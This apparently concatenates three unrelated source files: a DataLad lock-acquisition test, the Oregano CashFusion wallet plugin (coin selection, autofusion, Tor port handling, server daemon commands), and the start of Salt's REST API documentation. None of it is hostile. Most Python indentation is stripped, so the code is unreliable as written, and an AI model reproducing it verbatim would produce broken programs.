@with_tempfile
def test_try_lock_informatively(tempfile):
lock = InterProcessLock(tempfile + '.lck')
    lock_path = ensure_unicode(lock.path)  # can be bytes, complicates string formatting etc.
t0 = time()
with try_lock_informatively(lock, purpose="happy life") as acquired:
assert_true(lock.acquired)
assert_true(acquired)
assert_greater(2, time() - t0) # should not take any notable time, we cannot be blocking
"""
# InterProcessLock is not re-entrant so nesting should not be used, will result
# in exception on release
with try_lock_informatively(lock, timeouts=[dt, dt*2], proceed_unlocked=True) as acquired:
assert_true(lock.acquired) # due to outer cm
assert_true(acquired) # lock is reentrant apparently
"""
# Let's try in a completely different subprocess
runner = WitlessRunner(env=dict(os.environ, DATALAD_LOG_LEVEL='info', DATALAD_LOG_TARGET='stderr'))
script1 = Path(tempfile + "-script1.py")
script1_fmt = f"""
from fasteners import InterProcessLock
from time import time
from datalad.support.locking import try_lock_informatively
lock = InterProcessLock({lock_path!r})
with try_lock_informatively(lock, timeouts=[0.05, 0.15], proceed_unlocked={{proceed_unlocked}}) as acquired:
print("Lock acquired=%s" % acquired)
"""
script1.write_text(script1_fmt.format(proceed_unlocked=True))
t0 = time()
res = runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)
assert_in('Lock acquired=False', res['stdout'])
assert_in(f'Failed to acquire lock at {lock_path} in 0.05', res['stderr'])
assert_in(f'Failed to acquire lock at {lock_path} in 0.15', res['stderr'])
assert_in('proceed without locking', res['stderr'])
assert_greater(time() - t0, 0.19999) # should wait for at least 0.2
try:
import psutil
# PID does not correspond
assert_in('Check following process: PID=', res['stderr'])
assert_in(f'CWD={os.getcwd()} CMDLINE=', res['stderr'])
except ImportError:
pass # psutil was not installed, cannot get list of files
except AssertionError:
# we must have had the other one then
assert_in('failed to determine one', res['stderr'])
if not on_osx:
# so far we had only OSX reporting failing to get PIDs information
# but if it is something else -- re-raise original exception
raise
# in 2nd case, lets try without proceeding unlocked
script1.write_text(script1_fmt.format(proceed_unlocked=False))
t0 = time()
with assert_raises(CommandError) as cme:
runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)
assert_in(f"Failed to acquire lock at {lock_path} in 2 attempts.", str(cme.exception))
assert_in(f"RuntimeError", str(cme.exception))
assert_false(cme.exception.stdout) # nothing there since print should not happen
assert_in(f'Failed to acquire lock at {lock_path} in 0.05', cme.exception.stderr)
assert_in(f'Failed to acquire lock at {lock_path} in 0.15', cme.exception.stderr)
assert_greater(time() - t0, 0.19999) # should wait for at least 0.2
# now that we left context, should work out just fine
res = runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)
assert_in('Lock acquired=True', res['stdout'])
    assert_not_in('Failed to acquire lock', res['stderr'])
assert_not_in('PID', res['stderr'])
|
plugin.py
|
#!/usr/bin/env python3
#
# Oregano - a lightweight Ergon client
# CashFusion - an advanced coin anonymizer
#
# Copyright (C) 2020 Mark B. Lundeberg
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Base plugin (non-GUI)
"""
import math
import threading
import time
import weakref
from typing import Optional, Tuple
from oregano.address import Address
from oregano.bitcoin import COINBASE_MATURITY
from oregano.plugins import BasePlugin, hook, daemon_command
from oregano.i18n import _, ngettext, pgettext
from oregano.util import profiler, PrintError, InvalidPassword
from oregano import Network, networks
from .conf import Conf, Global
from .fusion import Fusion, can_fuse_from, can_fuse_to, is_tor_port, MIN_TX_COMPONENTS
from .server import FusionServer
from .covert import limiter
import random # only used to select random coins
TOR_PORTS = [9050, 9150]
# if more than <N> tor connections have been made recently (see covert.py) then don't start auto-fuses.
AUTOFUSE_RECENT_TOR_LIMIT_LOWER = 60
# if more than <N> tor connections have been made recently (see covert.py) then shut down auto-fuses that aren't yet started
AUTOFUSE_RECENT_TOR_LIMIT_UPPER = 120
# heuristic factor: guess that expected number of coins in wallet in equilibrium is = (this number) / fraction
COIN_FRACTION_FUDGE_FACTOR = 10
# for semi-linked addresses (that share txids in their history), allow linking them with this probability:
KEEP_LINKED_PROBABILITY = 0.1
# how long an auto-fusion may stay in 'waiting' state (without starting-soon) before it cancels itself
AUTOFUSE_INACTIVE_TIMEOUT = 600
# how many random coins to select max in 1 batch -- used by select_random_coins
DEFAULT_MAX_COINS = 20
assert DEFAULT_MAX_COINS > 10
# how many autofusions can be running per-wallet
MAX_AUTOFUSIONS_PER_WALLET = 10
CONSOLIDATE_MAX_OUTPUTS = MIN_TX_COMPONENTS // 3
pnp = None
def get_upnp():
""" return an initialized UPnP singleton """
global pnp
if pnp is not None:
return pnp
try:
import miniupnpc
except ImportError:
raise RuntimeError("python miniupnpc module not installed")
u = miniupnpc.UPnP()
if u.discover() < 1:
raise RuntimeError("can't find UPnP server")
try:
u.selectigd()
except Exception as e:
raise RuntimeError("failed to connect to UPnP IGD")
pnp = u
return u
def select_coins(wallet):
""" Sort the wallet's coins into address buckets, returning two lists:
- Eligible addresses and their coins.
- Ineligible addresses and their coins.
An address is eligible if it satisfies all conditions:
- the address is unfrozen
- has 1, 2, or 3 utxo
- all utxo are confirmed (or matured in case of coinbases)
- has no SLP utxo or frozen utxo
"""
# First, select all the coins
eligible = []
ineligible = []
has_unconfirmed = False
has_coinbase = False
sum_value = 0
mincbheight = (wallet.get_local_height() + 1 - COINBASE_MATURITY if Conf(wallet).autofuse_coinbase
else -1) # -1 here causes coinbase coins to always be rejected
for addr in wallet.get_addresses():
acoins = list(wallet.get_addr_utxo(addr).values())
if not acoins:
continue # prevent inserting empty lists into eligible/ineligible
good = True
if addr in wallet.frozen_addresses:
good = False
for i,c in enumerate(acoins):
sum_value += c['value'] # tally up values regardless of eligibility
# If too many coins, any SLP tokens, any frozen coins, or any
# immature coinbase on the address -> flag all address coins as
# ineligible if not already flagged as such.
good = good and (
i < 3 # must not have too many coins on the same address*
and not c['slp_token'] # must not be SLP
and not c['is_frozen_coin'] # must not be frozen
and (not c['coinbase'] or c['height'] <= mincbheight) # if coinbase -> must be mature coinbase
)
# * = We skip addresses with too many coins, since they take up lots
# of 'space' for consolidation. TODO: there is possibility of
# disruption here, if we get dust spammed. Need to deal with
# 'dusty' addresses by ignoring / consolidating dusty coins.
# Next, detect has_unconfirmed & has_coinbase:
if c['height'] <= 0:
# Unconfirmed -> Flag as not eligible and set the has_unconfirmed flag.
good = False
has_unconfirmed = True
# Update has_coinbase flag if not already set
has_coinbase = has_coinbase or c['coinbase']
if good:
eligible.append((addr,acoins))
else:
ineligible.append((addr,acoins))
return eligible, ineligible, int(sum_value), bool(has_unconfirmed), bool(has_coinbase)
def select_random_coins(wallet, fraction, eligible):
"""
Grab wallet coins with a certain probability, while also paying attention
to obvious linkages and possible linkages.
Returns list of list of coins (bucketed by obvious linkage).
"""
# First, we want to bucket coins together when they have obvious linkage.
# Coins that are linked together should be spent together.
# Currently, just look at address.
addr_coins = eligible
random.shuffle(addr_coins)
# While fusing we want to pay attention to semi-correlations among coins.
# When we fuse semi-linked coins, it increases the linkage. So we try to
# avoid doing that (but rarely, we just do it anyway :D).
# Currently, we just look at all txids touched by the address.
# (TODO this is a disruption vector: someone can spam multiple fusions'
# output addrs with massive dust transactions (2900 outputs in 100 kB)
# that make the plugin think that all those addresses are linked.)
result_txids = set()
result = []
num_coins = 0
for addr, acoins in addr_coins:
if num_coins >= DEFAULT_MAX_COINS:
break
elif num_coins + len(acoins) > DEFAULT_MAX_COINS:
continue
# For each bucket, we give a separate chance of joining.
if random.random() > fraction:
continue
# Semi-linkage check:
# We consider all txids involving the address, historical and current.
ctxids = {txid for txid, height in wallet.get_address_history(addr)}
collisions = ctxids.intersection(result_txids)
# Note each collision gives a separate chance of discarding this bucket.
if random.random() > KEEP_LINKED_PROBABILITY**len(collisions):
continue
# OK, no problems: let's include this bucket.
num_coins += len(acoins)
result.append(acoins)
result_txids.update(ctxids)
if not result:
# nothing was selected, just try grabbing first nonempty bucket
try:
res = next(coins for addr,coins in addr_coins if coins)
result = [res]
except StopIteration:
# all eligible buckets were cleared.
pass
return result
def get_target_params_1(wallet, wallet_conf, active_autofusions, eligible):
""" WIP -- TODO: Rename this function. """
mode = wallet_conf.fusion_mode
# Note each fusion 'consumes' a certain number of coins by freezing them,
# so that the next fusion has less eligible coins to work with. So each
# call to this may see a smaller n_buckets.
n_buckets = len(eligible)
if mode == 'normal':
return max(2, round(n_buckets / DEFAULT_MAX_COINS)), False
elif mode == 'fan-out':
return max(4, math.ceil(n_buckets / (COIN_FRACTION_FUDGE_FACTOR*0.65))), False
elif mode == 'consolidate':
if n_buckets < MIN_TX_COMPONENTS - CONSOLIDATE_MAX_OUTPUTS:
# Too few eligible buckets to make an effective consolidation.
return 0, False
# In the latter stages of consolidation, only do one fusion
# at a time with all-confirmed rule, to make sure each fusion's outputs
# may be consumed by the subsequent one.
# To avoid weird loops, try to calculate the TOTAL number of coins
# that are either 1) eligible or 2) being fused. (Should stay constant
# as fusions are added/cancelled)
n_coins = sum(len(acoins) for addr,acoins in eligible)
n_total = n_coins + sum(len(getattr(f, 'inputs', ())) for f in active_autofusions)
if n_total < DEFAULT_MAX_COINS*3:
return 1, True
# If coins are scarce then don't make more autofusions unless we
# have none.
if n_buckets < DEFAULT_MAX_COINS*2:
return 1, False
# We still have lots of coins left, so request another autofusion.
return MAX_AUTOFUSIONS_PER_WALLET, False
else: # 'custom'
target_num_auto = wallet_conf.queued_autofuse
confirmed_only = wallet_conf.autofuse_confirmed_only
return int(target_num_auto), bool(confirmed_only)
def get_target_params_2(wallet_conf, sum_value):
""" WIP -- TODO: Rename this function. """
mode = wallet_conf.fusion_mode
fraction = 0.1
if mode == 'custom':
# Determine the fraction that should be used
select_type, select_amount = wallet_conf.selector
if select_type == 'size' and int(sum_value) != 0:
# user wants to get a typical output of this size (in fixs)
fraction = COIN_FRACTION_FUDGE_FACTOR * select_amount / sum_value
elif select_type == 'count' and int(select_amount) != 0:
# user wants this number of coins
fraction = COIN_FRACTION_FUDGE_FACTOR / select_amount
elif select_type == 'fraction':
# user wants this fraction
fraction = select_amount
# note: fraction at this point could be <0 or >1 but doesn't matter.
elif mode == 'consolidate':
fraction = 1.0
elif mode == 'normal':
fraction = 0.5
elif mode == 'fan-out':
fraction = 0.1
return fraction
class FusionPlugin(BasePlugin):
fusion_server = None
active = True
_run_iter = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs) # gives us self.config
# Do an initial check on the tor port
self.tor_port_good = None
t = threading.Thread(name = 'Fusion-scan_torport_initial', target = self.scan_torport)
t.start()
# quick lock for the following two WeakKeyDictionary variables
# Locking order wallet.lock -> plugin.lock.
self.lock = threading.Lock()
self.fusions = weakref.WeakKeyDictionary()
self.autofusing_wallets = weakref.WeakKeyDictionary() # wallet -> password
self.t_last_net_ok = time.monotonic()
self.remote_donation_address: str = '' # optionally announced by the remote server in 'serverhello' message
if tuple(self.config.get('cashfusion_server', ())) == ('cashfusion.oregano.dk', 8787, False):
# User's config has the old default non-SSL server. If we see this,
# just wipe the config key so that the new default is used.
# But only reset once, after that let them go back if that is what
# they truly desire.
if self.config.get('cashfusion_server_defaultresetted', 0) < 1:
self.config.set_key('cashfusion_server', None)
self.config.set_key('cashfusion_server_defaultresetted', 1)
def on_close(self,):
super().on_close()
self.stop_fusion_server()
self.active = False
def fullname(self):
return 'CashFusion'
def description(self):
return _("CashFusion Protocol")
def is_available(self):
return networks.net is not networks.TaxCoinNet
def set_remote_donation_address(self, address : str):
self.remote_donation_address = ((isinstance(address, str) and address) or '')[:100]
def get_server(self, ):
return Global(self.config).server
def set_server(self, host, port, ssl):
gconf = Global(self.config)
old = gconf.server
gconf.server = (host, port, ssl) # type/sanity checking done in setter
if old != gconf.server:
self.on_server_changed()
def get_torhost(self):
if self.has_auto_torport():
return Global.Defaults.TorHost
else:
return Global(self.config).tor_host
def set_torhost(self, host):
''' host should be a valid hostname '''
if not host: return
Global(self.config).tor_host = host
def has_auto_torport(self, ):
return Global(self.config).tor_port_auto
def get_torport(self, ):
        ''' Retrieve either the manual port or the autodetected port; may return
        None if in 'auto' mode and no Tor port has been autodetected. (this is non-blocking) '''
if self.has_auto_torport():
return self.tor_port_good
else:
return Global(self.config).tor_port_manual
def set_torport(self, port):
# port may be 'auto' or 'manual' or an int
gconf = Global(self.config)
if port == 'auto':
gconf.tor_port_auto = True
return
else:
gconf.tor_port_auto = False
if port == 'manual':
return # we're simply going to use whatever manual port was already set
assert isinstance(port, int)
gconf.tor_port_manual = port
def scan_torport(self, ):
''' Scan for Tor proxy on either the manual port or on a series of
automatic ports. This is blocking. Returns port if it's up, or None if
down / can't find. '''
host = self.get_torhost()
if self.has_auto_torport():
portlist = []
network = Network.get_instance()
if network:
tc = network.tor_controller
if tc and tc.is_enabled() and tc.active_socks_port:
portlist.append(tc.active_socks_port)
portlist.extend(TOR_PORTS)
else:
portlist = [ Global(self.config).tor_port_manual ]
for port in portlist:
if is_tor_port(host, port):
self.tor_port_good = port
break
else:
self.tor_port_good = None
return self.tor_port_good
def on_server_changed(self):
""" When the server is changed, we stop all extant fusions that are not
already 'running' in order to allow for the new change to take effect
immediately. """
self.remote_donation_address = ''
self.stop_all_fusions('Server changed', not_if_running=True)
def get_all_fusions(self, ):
""" Return all still-live fusion objects that have been created using .start_fusion(),
including autofusions and any other fusions. """
with self.lock:
fusions_and_times = list(self.fusions.items())
fusions_and_times.sort(key=lambda x:x[1])
return [f for f,t in fusions_and_times]
def stop_all_fusions(self, reason, *, not_if_running=True):
with self.lock:
for f in list(self.fusions):
f.stop(reason, not_if_running = not_if_running)
@staticmethod
def stop_autofusions(wallet, reason, *, not_if_running=True):
with wallet.lock:
try:
fusion_weakset = wallet._fusions_auto
except AttributeError:
return []
running = []
for f in list(fusion_weakset):
if not f.is_alive():
fusion_weakset.discard(f)
continue
f.stop(reason, not_if_running = not_if_running)
if f.status[0] == 'running':
running.append(f)
return running
def disable_autofusing(self, wallet):
with self.lock:
self.autofusing_wallets.pop(wallet, None)
Conf(wallet).autofuse = False
return self.stop_autofusions(wallet, 'Autofusing disabled', not_if_running=True)
def enable_autofusing(self, wallet, password):
if password is None and wallet.has_password():
raise InvalidPassword()
else:
wallet.check_password(password)
with self.lock:
self.autofusing_wallets[wallet] = password
Conf(wallet).autofuse = True
def is_autofusing(self, wallet):
with self.lock:
return (wallet in self.autofusing_wallets)
def add_wallet(self, wallet, password=None):
''' Attach the given wallet to fusion plugin, allowing it to be used in
fusions with clean shutdown. Also start auto-fusions for wallets that want
it (if no password).
'''
with wallet.lock:
# Generate wallet._fusions and wallet._fusions_auto; these must
# only be accessed with wallet.lock held.
# all fusions relating to this wallet, either as source or target
# or both.
wallet._fusions = weakref.WeakSet()
# fusions that were auto-started.
wallet._fusions_auto = weakref.WeakSet()
# all accesses to the above must be protected by wallet.lock
if Conf(wallet).autofuse:
try:
self.enable_autofusing(wallet, password)
except InvalidPassword:
self.disable_autofusing(wallet)
def remove_wallet(self, wallet):
''' Detach the provided wallet; returns list of active fusion threads. '''
with self.lock:
self.autofusing_wallets.pop(wallet, None)
fusions = ()
try:
with wallet.lock:
fusions = list(wallet._fusions)
del wallet._fusions
del wallet._fusions_auto
except AttributeError:
pass
return [f for f in fusions if f.is_alive()]
def start_fusion(self, source_wallet, password, coins, target_wallet = None, max_outputs = None, inactive_timeout = None):
""" Create and start a new Fusion object with current server/tor settings.
Both source_wallet.lock and target_wallet.lock must be held.
FIXME: this condition is begging for a deadlock to happen when the two wallets
are different. Need to find a better way if inter-wallet fusing actually happens.
"""
if target_wallet is None:
target_wallet = source_wallet # self-fuse
assert can_fuse_from(source_wallet)
assert can_fuse_to(target_wallet)
host, port, ssl = self.get_server()
if host == 'localhost':
# as a special exemption for the local fusion server, we don't use Tor.
torhost = None
torport = None
else:
torhost = self.get_torhost()
torport = self.get_torport()
if torport is None:
torport = self.scan_torport() # may block for a very short time ...
if torport is None:
self.notify_server_status(False, ("failed", _("Invalid Tor proxy or no Tor proxy found")))
raise RuntimeError("can't find tor port")
fusion = Fusion(self, target_wallet, host, port, ssl, torhost, torport)
fusion.add_coins_from_wallet(source_wallet, password, coins)
fusion.max_outputs = max_outputs
with self.lock:
fusion.start(inactive_timeout = inactive_timeout)
self.fusions[fusion] = time.time()
target_wallet._fusions.add(fusion)
source_wallet._fusions.add(fusion)
return fusion
def thread_jobs(self, ):
return [self]
def run(self, ):
# this gets called roughly every 0.1 s in the Plugins thread; downclock it to 5 s.
run_iter = self._run_iter + 1
if run_iter < 50:
self._run_iter = run_iter
return
else:
self._run_iter = 0
if not self.active:
return
dont_start_fusions = False
network = Network.get_instance()
if network and network.is_connected():
self.t_last_net_ok = time.monotonic()
else:
# Cashfusion needs an accurate picture of the wallet's coin set, so
# that we don't reuse addresses and we don't submit already-spent coins.
# Currently the network is not synced so we won't start new fusions.
dont_start_fusions = True
if time.monotonic() - self.t_last_net_ok > 31:
# If the network is disconnected for an extended period, we also
# shut down all waiting fusions. We can't wait too long because
# one fusion might succeed but then enter the 'time_wait' period
# where it is waiting to see the transaction on the network.
# After 60 seconds it gives up and then will unreserve addresses,
# and currently-waiting fusions would then grab those addresses when
# they begin rounds.
self.stop_all_fusions('Lost connection to Oregano server', not_if_running = True)
return
# Snapshot of autofusing list; note that remove_wallet may get
# called on one of the wallets, after lock is released.
with self.lock:
wallets_and_passwords = list(self.autofusing_wallets.items())
torcount = limiter.count
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_UPPER:
# need tor cooldown, stop the waiting autofusions
for wallet, password in wallets_and_passwords:
self.stop_autofusions(wallet, 'Tor cooldown', not_if_running = True)
return
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_LOWER:
# no urgent need to stop fusions, but don't queue up any more.
dont_start_fusions = True
for wallet, password in wallets_and_passwords:
with wallet.lock:
if not hasattr(wallet, '_fusions'):
continue
if not wallet.up_to_date:
# We want a good view of the wallet so we know which coins
# are unspent and confirmed, and we know which addrs are
# used. Note: this `continue` will bypass the potential .stop()
# below.
continue
for f in list(wallet._fusions_auto):
if not f.is_alive():
wallet._fusions_auto.discard(f)
active_autofusions = list(wallet._fusions_auto)
if dont_start_fusions and not active_autofusions:
continue
num_auto = len(active_autofusions)
wallet_conf = Conf(wallet)
eligible, ineligible, sum_value, has_unconfirmed, has_coinbase = select_coins(wallet)
target_num_auto, confirmed_only = get_target_params_1(wallet, wallet_conf, active_autofusions, eligible)
if confirmed_only and has_unconfirmed:
for f in list(wallet._fusions_auto):
f.stop('Wallet has unconfirmed coins... waiting.', not_if_running = True)
continue
if not dont_start_fusions and num_auto < min(target_num_auto, MAX_AUTOFUSIONS_PER_WALLET):
# we don't have enough auto-fusions running, so start one
fraction = get_target_params_2(wallet_conf, sum_value)
chosen_buckets = select_random_coins(wallet, fraction, eligible)
coins = [c for l in chosen_buckets for c in l]
if not coins:
self.print_error("auto-fusion skipped due to lack of coins")
continue
if wallet_conf.fusion_mode == 'consolidate':
max_outputs = CONSOLIDATE_MAX_OUTPUTS
if len(chosen_buckets) < (MIN_TX_COMPONENTS - max_outputs):
self.print_error("consolidating auto-fusion skipped due to lack of unrelated coins")
continue
else:
max_outputs = None
try:
f = self.start_fusion(wallet, password, coins, max_outputs = max_outputs, inactive_timeout = AUTOFUSE_INACTIVE_TIMEOUT)
self.print_error("started auto-fusion")
except RuntimeError as e:
self.print_error(f"auto-fusion skipped due to error: {e}")
return
wallet._fusions_auto.add(f)
def start_fusion_server(self, network, bindhost, port, upnp = None, announcehost = None, donation_address = None):
if self.fusion_server:
raise RuntimeError("server already running")
donation_address = (isinstance(donation_address, Address) and donation_address) or None
self.fusion_server = FusionServer(self.config, network, bindhost, port, upnp = upnp, announcehost = announcehost, donation_address = donation_address)
self.fusion_server.start()
return self.fusion_server.host, self.fusion_server.port
def stop_fusion_server(self):
try:
self.fusion_server.stop('server stopped by operator')
self.fusion_server = None
except Exception:
pass
def update_coins_ui(self, wallet):
''' Default implementation does nothing. Qt plugin subclass overrides
this, which sends a signal to the main thread to update the coins tab.
This is called by the Fusion thread (in its thread context) when it
freezes & unfreezes coins. '''
def notify_server_status(self, b, tup : tuple = None):
''' The Qt plugin subclass implements this to tell the GUI about bad
servers. '''
if not b: self.print_error("notify_server_status:", b, str(tup))
@hook
def donation_address(self, window) -> Optional[Tuple[str,Address]]:
''' Plugin API: Returns a tuple of (description, Address) or None. This
is the donation address that we as a client got from the remote server
(as opposed to the donation address we announce if we are a server). '''
if self.remote_donation_address and Address.is_valid(self.remote_donation_address):
return (self.fullname() + " " + _("Server") + ": " + self.get_server()[0], Address.from_string(self.remote_donation_address))
@daemon_command
def fusion_server_start(self, daemon, config):
# Usage:
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port>
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> <donation_addr>
# ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp <donation_addr>
# e.g.:
# ./oregano daemon fusion_server_start 0.0.0.0,myfusionserver.com 8787 upnp bitcoincash:qpxiweuqoiweweqeweqw
#
# The main server port will be bound on <bindhost>:<port>.
# Covert submissions will be bound on <bindhost>:<ephemeral_port> (the port is chosen by the OS)
# The main server will tell clients to connect to <announcehost>:<ephemeral_port> .
# The default announcehost is based on an autodetection system, which may not work for some server networking setups.
network = daemon.network
if not network:
return "error: cannot run fusion server without an SPV server connection"
def invoke(firstarg = '0.0.0.0', sport='8787', upnp_str = None, addr_str = None):
bindhost, *extrahosts = firstarg.split(',')
if len(extrahosts) > 1:
raise Exception("too many hosts")
elif len(extrahosts) == 1:
[announcehost,] = extrahosts
else:
announcehost = None
port = int(sport)
pnp = get_upnp() if upnp_str == 'upnp' else None
if not pnp and not addr_str:
# third arg may be addr_str, so swap the args
addr_str = upnp_str
upnp_str = None
addr = None
if addr_str:
assert Address.is_valid(addr_str), "Invalid donation address specified"
addr = Address.from_string(addr_str)
return self.start_fusion_server(network, bindhost, port, upnp = pnp, announcehost = announcehost, donation_address = addr)
try:
host, port = invoke(*config.get('subargs', ()))
except Exception as e:
import traceback, sys; traceback.print_exc(file=sys.stderr)
return f'error: {str(e)}'
return (host, port)
@daemon_command
def fusion_server_stop(self, daemon, config):
self.stop_fusion_server()
return 'ok'
@daemon_command
def fusion_server_status(self, daemon, config):
if not self.fusion_server:
return "fusion server not running"
return dict(poolsizes = {t: len(pool.pool) for t,pool in self.fusion_server.waiting_pools.items()})
@daemon_command
def fusion_server_fuse(self, daemon, config):
if self.fusion_server is None:
return
subargs = config.get('subargs', ())
if len(subargs) != 1:
return "expecting tier"
tier = int(subargs[0])
num_clients = self.fusion_server.start_fuse(tier)
return num_clients
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
        .. versionadded:: Carbon
log_error_file
Path to a file to write HTTP error logs.
        .. versionadded:: Carbon
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
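    For example, a fuller (purely illustrative) ``rest_cherrypy`` stanza
    combining several of the options above might look like:
    .. code-block:: yaml
        rest_cherrypy:
          port: 8000
          host: 0.0.0.0
          ssl_crt: /etc/pki/tls/certs/localhost.crt
          ssl_key: /etc/pki/tls/certs/localhost.key
          thread_pool: 100
          socket_queue_size: 30
          static: /srv/salt-api/static
          static_path: /static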
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
